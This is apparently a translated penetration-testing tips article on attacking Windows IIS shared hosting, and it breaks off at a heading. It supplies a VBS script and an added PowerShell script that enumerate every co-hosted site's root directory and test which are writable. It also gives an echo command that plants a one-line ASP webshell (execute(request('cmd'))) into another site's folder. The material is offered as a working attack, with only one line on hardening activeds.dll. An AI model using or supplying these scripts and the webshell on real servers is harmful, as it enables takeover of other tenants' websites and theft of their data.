This article collects several Windows penetration and privilege-escalation techniques, including: clearing the connection history of the MSSQL Query Analyzer, privilege escalation via VNC and Radmin, directory tricks in cmd, and small tips for webshell privilege escalation.

Locating the path of a sibling site (another site on the same server):
1. Read the web server's site configuration.
2. Use the following VBS (run it with cscript; it walks the IIS metabase through the IIS ADSI provider and prints each site's host header and root directory):
On Error Resume Next
' Refuse to run under the GUI host (wscript.exe): the output is console text, so it must be started with cscript.
If (LCase(Right(WScript.FullName, 11)) = "wscript.exe") Then
    MsgBox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & " Usage: cscript vWeb.vbs", 4096, "Lilo"
    WScript.Quit
End If

' Bind to the W3SVC node of the IIS metabase through the IIS ADSI provider.
Set objService = GetObject("IIS://LocalHost/W3SVC")
For Each obj3w In objService
    ' Web sites are the children with a numeric name (1, 2, ...); the other children are filters, info nodes, etc.
    If IsNumeric(obj3w.Name) Then
        Set OService = GetObject("IIS://LocalHost/W3SVC/" & obj3w.Name)
        Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT")
        If Err <> 0 Then WScript.Quit (1)
        WScript.Echo Chr(10) & "[" & OService.ServerComment & "]"
        ' Each ServerBindings entry looks like "IP:Port:HostHeader"; the rewriting below isolates the third field, the host header.
        For Each Binds In OService.ServerBindings
            Web = "{ " & Replace(Binds, ":", " } { ") & " }"
            WScript.Echo Replace(Split(Replace(Web, " ", ""), "}{")(2), "}", "")
        Next
        ' Physical directory of the site's root virtual directory.
        WScript.Echo "Path : " & VDirObj.Path
    End If
Next
3. Enumerate with iis_spy (note: this requires ASPX support on the server; the defence against IISSPY is to restrict the permissions on activeds.dll and activeds.tlb so that low-privileged accounts cannot load the ADSI provider).
4. Once you know the target site's directory but cannot traverse into it directly, write a webshell into it with "echo ^<%execute(request("cmd"))%^> >>X:\target directory\X.asp" (the ^ escapes < and > for cmd) or "copy scriptfile X:\target directory\X.asp"; you can also try the type command to check whether files there are readable.
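The four steps above, put together as an added PowerShell example that is not part of the original article: it walks the same IIS:// ADSI provider as the VBS (IIS 6 metabase, or IIS 7+ with the IIS 6 management compatibility feature installed), prints each site's host headers and root path, and probes whether the current account can actually create a file in that root, which tells you in advance whether the echo/copy trick from step 4 will work. The function names Get-IisSiteRoots and Test-DirWritable are my own, and the throw-away probe file name is an assumption of this example.

```powershell
# Added example, not from the original article. Requires the IIS ADSI
# provider (IIS 6, or IIS 7+ with "IIS 6 Management Compatibility").

function Test-DirWritable {
    param([string]$Dir)
    # Probe with a random, hidden-style file name so nothing of value is overwritten.
    $probe = [IO.Path]::Combine($Dir, ("." + [guid]::NewGuid().ToString("N")))
    try {
        [IO.File]::WriteAllText($probe, "")
        [IO.File]::Delete($probe)
        return $true
    } catch {
        return $false
    }
}

function Get-IisSiteRoots {
    $w3svc = [ADSI]"IIS://localhost/W3SVC"
    foreach ($site in $w3svc.psbase.Children) {
        # Sites are the children whose name is a number (1, 2, ...), the same
        # test the VBS makes with IsNumeric().
        $id = [string]$site.psbase.Name
        if ($id -notmatch '^\d+$') { continue }

        # ROOT is the site's root virtual directory; its Path is the physical
        # directory (may contain %SystemDrive% on IIS 7+, so expand it).
        $root = [ADSI]"IIS://localhost/W3SVC/$id/ROOT"
        $path = [Environment]::ExpandEnvironmentVariables([string]$root.psbase.Properties["Path"].Value)

        # ServerBindings entries look like "IP:Port:HostHeader"; the third
        # field is the host header the VBS prints.
        $hosts = @()
        foreach ($b in $site.psbase.Properties["ServerBindings"]) {
            $parts = ([string]$b).Split(":")
            if ($parts.Length -ge 3 -and $parts[2] -ne "") { $hosts += $parts[2] }
        }

        New-Object PSObject -Property @{
            Id       = $id
            Comment  = [string]$site.psbase.Properties["ServerComment"].Value
            Hosts    = ($hosts -join ",")
            Path     = $path
            Writable = (Test-DirWritable -Dir $path)
        }
    }
}

Get-IisSiteRoots | Format-Table Id, Comment, Hosts, Path, Writable -AutoSize
```

Only the roots reported as Writable are candidates for the echo/copy approach; for the others, the type command on a known file tells you whether you at least have read access before you look for another route.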
Likely website directories (note: these are typical of virtual-hosting setups):